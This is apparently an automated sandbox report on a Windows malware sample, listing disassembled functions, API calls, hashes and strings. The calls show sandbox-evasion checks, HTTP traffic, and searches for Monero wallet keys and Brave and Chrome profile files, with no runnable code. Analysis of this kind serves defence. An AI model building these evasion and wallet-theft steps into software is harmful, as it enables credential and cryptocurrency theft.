                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: ecb2e817fe77180bcdf13652f22c6df44b58ee32fd8cdaafb3dc4e51906cdbe5
                              • Instruction ID: 6db6e486095ea2a1ceb18dc8468d69eb0c9129546fa8ba9372673b472ee49154
                              • Opcode Fuzzy Hash: ecb2e817fe77180bcdf13652f22c6df44b58ee32fd8cdaafb3dc4e51906cdbe5
                              • Instruction Fuzzy Hash: 844181B1904348ABDB10DF98DC95BDEBBB8FB58704F140199F509AB280DB746A44CBA6

                              Control-flow Graph

                              APIs
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420408), ref: 008B98A1
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420618), ref: 008B98BA
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420630), ref: 008B98D2
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420678), ref: 008B98EA
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,014206A8), ref: 008B9903
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,014286D0), ref: 008B991B
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01415D48), ref: 008B9933
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01415B88), ref: 008B994C
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420420), ref: 008B9964
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,014204E0), ref: 008B997C
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,014203F0), ref: 008B9995
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420540), ref: 008B99AD
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01415AC8), ref: 008B99C5
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420468), ref: 008B99DE
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008A11D0: ExitProcess.KERNEL32 ref: 008A1211
                                • Part of subcall function 008A1160: GetSystemInfo.KERNEL32(?), ref: 008A116A
                                • Part of subcall function 008A1160: ExitProcess.KERNEL32 ref: 008A117E
                                • Part of subcall function 008A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008A112B
                                • Part of subcall function 008A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 008A1132
                                • Part of subcall function 008A1110: ExitProcess.KERNEL32 ref: 008A1143
                                • Part of subcall function 008A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008A123E
                                • Part of subcall function 008A1220: __aulldiv.LIBCMT ref: 008A1258
                                • Part of subcall function 008A1220: __aulldiv.LIBCMT ref: 008A1266
                                • Part of subcall function 008A1220: ExitProcess.KERNEL32 ref: 008A1294
                                • Part of subcall function 008B6770: GetUserDefaultLangID.KERNEL32 ref: 008B6774
                                • Part of subcall function 008A1190: ExitProcess.KERNEL32 ref: 008A11C6
                                • Part of subcall function 008B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
                                • Part of subcall function 008B7850: RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
                                • Part of subcall function 008B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F
                                • Part of subcall function 008B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
                                • Part of subcall function 008B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
                                • Part of subcall function 008B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01428740,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008B6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 008B6AF9
                              • Sleep.KERNEL32(00001770), ref: 008B6B04
                              • CloseHandle.KERNEL32(?,00000000,?,01428740,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6B1A
                              • ExitProcess.KERNEL32 ref: 008B6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: db0dd19f2d8482b089ff5cbc31fc7a8ad4bff8215257addc34d704f766ec4db2
                              • Instruction ID: b4526e98b8b4831e9f0274add825dcd3d0dfaa0568ff5491e7c62d80ee6620ce
                              • Opcode Fuzzy Hash: db0dd19f2d8482b089ff5cbc31fc7a8ad4bff8215257addc34d704f766ec4db2
                              • Instruction Fuzzy Hash: 3D310E71900208AAEB08FBE8DC96BEE7778FF54340F504528F112E6691EF746905C7A7

                              Control-flow Graph

                              Control-flow graph of the function starting at 008A1220 (graph rendering not recoverable from the page; the API calls it makes are listed below)
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008A123E
                              • __aulldiv.LIBCMT ref: 008A1258
                              • __aulldiv.LIBCMT ref: 008A1266
                              • ExitProcess.KERNEL32 ref: 008A1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: edb37137f32978ee57a64be7ff40570977f65984692822da9bb1abe6f56e441e
                              • Instruction ID: a4f39301facf445028dd3b0fd6ae854c460827c7d7840cf4724749e5d9fd94c3
                              • Opcode Fuzzy Hash: edb37137f32978ee57a64be7ff40570977f65984692822da9bb1abe6f56e441e
                              • Instruction Fuzzy Hash: 1C01FBB0944308BAEF10DBE4CC89B9EBB78FB15705F248058E605FA680D774A545879A

                              Control-flow Graph

                              Control-flow graph of the function spanning 008B6ABA-008B6B22 (graph rendering not recoverable from the page; the API calls it makes are listed below)
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01428740,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008B6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 008B6AF9
                              • Sleep.KERNEL32(00001770), ref: 008B6B04
                              • CloseHandle.KERNEL32(?,00000000,?,01428740,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6B1A
                              • ExitProcess.KERNEL32 ref: 008B6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: d49d8a20756c514d79b4a54ef3055d4179470620cec25850f2b552b3326dffdf
                              • Instruction ID: 7e7e3a43380321761e17083ad7f06cd6ecc74d556b9a1b41278b43422669815b
                              • Opcode Fuzzy Hash: d49d8a20756c514d79b4a54ef3055d4179470620cec25850f2b552b3326dffdf
                              • Instruction Fuzzy Hash: B8F03470A40229ABEB10EBE09C4ABFE7A34FB14701F104915B502F92D1EBB46541DBA7

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 5dfebba0dd7167c2ed9ac6531ddf01ba3312a4405de3f59ec54794bdaaded0d1
                              • Instruction ID: 64c34cac884370ee31bcd4967871e1e94fc607fbd7704908cdb0fe92a34b63c6
                              • Opcode Fuzzy Hash: 5dfebba0dd7167c2ed9ac6531ddf01ba3312a4405de3f59ec54794bdaaded0d1
                              • Instruction Fuzzy Hash: AA216FB1D00209ABDF14DFA5EC49ADE7B74FB44320F008625F915A72D1EB706A0ACF91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A6280: InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
                                • Part of subcall function 008A6280: StrCmpCA.SHLWAPI(?,0142F028), ref: 008A6303
                                • Part of subcall function 008A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
                                • Part of subcall function 008A6280: HttpOpenRequestA.WININET(00000000,GET,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A6385
                                • Part of subcall function 008A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
                                • Part of subcall function 008A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 00ae95a0a92154c2d3f0f94557c7822b81af4820ce3483ca4b0e2455a0758289
                              • Instruction ID: c02457e96f7f7d546f0d2e66b5a309ad238f4e030b4fc61a05562eca5232f896
                              • Opcode Fuzzy Hash: 00ae95a0a92154c2d3f0f94557c7822b81af4820ce3483ca4b0e2455a0758289
                              • Instruction Fuzzy Hash: B911EF30910548B6DB18FF68DD96AED7778FF50300F404168F91ADA692EF34AB05C693
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008A112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 008A1132
                              • ExitProcess.KERNEL32 ref: 008A1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: fadc52dfd8a2892281694684a9d38ae779e0d918087dc0a962c73b02442e99f1
                              • Instruction ID: a6b8f180a06f4b8cfe82bb5767efe781728606f19fa55d19619b35d37240cbe5
                              • Opcode Fuzzy Hash: fadc52dfd8a2892281694684a9d38ae779e0d918087dc0a962c73b02442e99f1
                              • Instruction Fuzzy Hash: 83E08670945348FFEB10EBE09C4EB087AB8EB04B01F104044F708BA5C0D6B43601979A
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008A10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008A10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 07691884c1e7cdded092ab148d12a0d844a1c309b0a090245bad014cfb379c20
                              • Instruction ID: 34f5bae465d8c4251847826dd5a883328f74f600a485731d1c9d8bb3d7bfe7d5
                              • Opcode Fuzzy Hash: 07691884c1e7cdded092ab148d12a0d844a1c309b0a090245bad014cfb379c20
                              • Instruction Fuzzy Hash: 03F0E271641208BBEB14DAA8AC89FAAB7ECE705B15F300448F604E7280D571AE00CBA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: b49cb51966b13bbac2d9c95c4c78df551ec01bcf261cf2338eb2107149db3720
                              • Instruction ID: 8d7db8cac446c779ab730e7294cbb49504a663b30d901e934bbab89bdbeaccb6
                              • Opcode Fuzzy Hash: b49cb51966b13bbac2d9c95c4c78df551ec01bcf261cf2338eb2107149db3720
                              • Instruction Fuzzy Hash: 4EF0F47105E304EFCB21AF26CA4932EF3F4AF94711F24880EE6C547614DA368A54EB5B
                              APIs
                                • Part of subcall function 008B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
                                • Part of subcall function 008B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
                                • Part of subcall function 008B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F
                                • Part of subcall function 008B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
                                • Part of subcall function 008B7850: RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
                                • Part of subcall function 008B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F
                              • ExitProcess.KERNEL32 ref: 008A11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 9eecff8197b86b84384c96d419baf4b0eeb35d9d7f8ef1971ac208b8b73e920d
                              • Instruction ID: 24defdd9049a7b4623bb2ac3d716d3ec174f895e1ab7cc0b1aa8b7f3413ee0fe
                              • Opcode Fuzzy Hash: 9eecff8197b86b84384c96d419baf4b0eeb35d9d7f8ef1971ac208b8b73e920d
                              • Instruction Fuzzy Hash: 6EE012B595434153DE00B3F8AC4AB6A369CFB65385F041424FA09D6702FA25F802C66F
                              APIs
                              • wsprintfA.USER32 ref: 008B38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 008B38E3
                              • lstrcat.KERNEL32(?,?), ref: 008B3935
                              • StrCmpCA.SHLWAPI(?,008C0F70), ref: 008B3947
                              • StrCmpCA.SHLWAPI(?,008C0F74), ref: 008B395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008B3C67
                              • FindClose.KERNEL32(000000FF), ref: 008B3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 423416a42e588fd4cde2d72abbfd9a9742ddd6ef46146f103413a9381553c8ce
                              • Instruction ID: a537964d9717eae87f9807420d0253b0109070f0576256bda3cb1e5d799293ba
                              • Opcode Fuzzy Hash: 423416a42e588fd4cde2d72abbfd9a9742ddd6ef46146f103413a9381553c8ce
                              • Instruction Fuzzy Hash: C5A150B1A00258ABDB24DFA4DC85FEE7778FB59300F044588B51DD6241EB74AB85CF62
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,008C0B32,008C0B2B,00000000,?,?,?,008C13F4,008C0B2A), ref: 008ABEF5
                              • StrCmpCA.SHLWAPI(?,008C13F8), ref: 008ABF4D
                              • StrCmpCA.SHLWAPI(?,008C13FC), ref: 008ABF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AC7BF
                              • FindClose.KERNEL32(000000FF), ref: 008AC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 3cb181106dc2143714da9fff38ba15157bbd4b72375a2ff9bdbfeec4e6176551
                              • Instruction ID: 045d0e61bbe8f9ba85a7f765f43726aa8b112e3675c39f34956134043da08184
                              • Opcode Fuzzy Hash: 3cb181106dc2143714da9fff38ba15157bbd4b72375a2ff9bdbfeec4e6176551
                              • Instruction Fuzzy Hash: D8424471910108ABDB18FBB4DC96EED737DFB54300F404568B50AE6691EE34AB49CBA3
                              APIs
                              • wsprintfA.USER32 ref: 008B492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 008B4943
                              • StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
                              • StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
                              • FindClose.KERNEL32(000000FF), ref: 008B4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 37a8211af8832bebe236f8c31327bf42b6fef1ed3686ba873bdbed278993fca4
                              • Instruction ID: 20220101d80093af501a1525e016a42ecf25698155a93a8a49319ae1883cd1d8
                              • Opcode Fuzzy Hash: 37a8211af8832bebe236f8c31327bf42b6fef1ed3686ba873bdbed278993fca4
                              • Instruction Fuzzy Hash: 2C6122B1910218ABCB24EBE4DC85FEA777CFB58700F04858CB649D6141EA75EB858F92
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008B4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B4587
                              • wsprintfA.USER32 ref: 008B45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 008B45BD
                              • StrCmpCA.SHLWAPI(?,008C0FC4), ref: 008B45EB
                              • StrCmpCA.SHLWAPI(?,008C0FC8), ref: 008B4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008B468B
                              • FindClose.KERNEL32(000000FF), ref: 008B46A0
                              • lstrcat.KERNEL32(?,0142F0D8), ref: 008B46C5
                              • lstrcat.KERNEL32(?,0142D110), ref: 008B46D8
                              • lstrlen.KERNEL32(?), ref: 008B46E5
                              • lstrlen.KERNEL32(?), ref: 008B46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 717dd2415c0e56a4e92eda9be53aa0d3aab7b12a3ceef3fd3f344cc8632ad97a
                              • Instruction ID: f670dfc0e2ecbeb2ab2ffec243740e5e078d8819b65041b4f172fdfa597c7549
                              • Opcode Fuzzy Hash: 717dd2415c0e56a4e92eda9be53aa0d3aab7b12a3ceef3fd3f344cc8632ad97a
                              • Instruction Fuzzy Hash: 145156B59102189BDB24EBB4DC89FE9777CFB64300F404588B609D6191EF74AB85CF92
                              APIs
                              • wsprintfA.USER32 ref: 008B3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 008B3EDA
                              • StrCmpCA.SHLWAPI(?,008C0FAC), ref: 008B3F08
                              • StrCmpCA.SHLWAPI(?,008C0FB0), ref: 008B3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008B406C
                              • FindClose.KERNEL32(000000FF), ref: 008B4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 49f34f55e9b254fb9ee7f57bbd513b0afbf9cb575da7d422cd862490ba36d077
                              • Instruction ID: 8dfb8ce0b9c953336a1c92520c34058626e1f2f47457dd09806d4317d9ec5063
                              • Opcode Fuzzy Hash: 49f34f55e9b254fb9ee7f57bbd513b0afbf9cb575da7d422cd862490ba36d077
                              • Instruction Fuzzy Hash: C95145B6900218ABCB24EBB4DC85EEA777CFB54700F00458CB659D6140DB75EB86CF52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: n?o$2~^{$B|}$J~v$\6^f$\d?y$`U8'$zAw$|P$}\?$B_$Ek$\o_$wT
                              • API String ID: 0-2021813861
                              • Opcode ID: f1de7acf885e0d1c5797ee4d3da9ba2f44fca9ed0fa748615806d529d1f5f801
                              • Instruction ID: dc007a0bdcc966748144e0480215e973562676c383422d2cb251780808035754
                              • Opcode Fuzzy Hash: f1de7acf885e0d1c5797ee4d3da9ba2f44fca9ed0fa748615806d529d1f5f801
                              • Instruction Fuzzy Hash: CEB22AF39082049FE304AE2DDC8566AFBE9EF94720F1A4A3DE9C4D3744E63599058793
                              APIs
                              • wsprintfA.USER32 ref: 008AED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 008AED55
                              • StrCmpCA.SHLWAPI(?,008C1538), ref: 008AEDAB
                              • StrCmpCA.SHLWAPI(?,008C153C), ref: 008AEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AF2AE
                              • FindClose.KERNEL32(000000FF), ref: 008AF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                               • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
